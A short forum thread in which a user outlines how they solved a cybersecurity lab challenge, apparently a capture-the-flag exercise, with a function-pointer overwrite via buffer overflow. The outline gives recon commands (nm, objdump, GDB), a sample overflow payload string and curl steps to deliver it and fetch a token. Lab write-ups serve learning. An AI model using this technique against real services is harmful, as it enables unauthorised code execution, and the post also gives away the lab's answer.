Forum Discussion
Bronze IIITrick or Treat on Specter Street: Morphy’s Mansion
Bronze IIIYes immervivesolver. Took me a few days and assistance from AI to solve this.
The strategy was to use No-ROP Function-Pointer Overwrite.
Following the steps below:
1. Check Backend Health
curl -s http://x.x.x.x/api/health
2. Analyze Vulnerable Binary:
nm -C ./move_logger | grep rotate_old_logs
objdump -d ./move_logger | awk '/<system@plt>/{print; getline; print}'
3. Confirm Stack Layout in GDB
(use PEDA and execute: p &moves , p &log to find the buffer size)
4. Craft Overflow Payload:
Payload: e4aaaaaaaaaaaaaaXXXXXX0000000000
5. Exploit via API - curl POST
6. Retrieve Token by using curl
Hope that helps.
Bronze IIWow, this is exactly what I'd have needed!
All I needed was to finish this one task and I would have finished the lab, but I only have access to the platform one month a year (October, Cybersecurity Month...).
Next time!
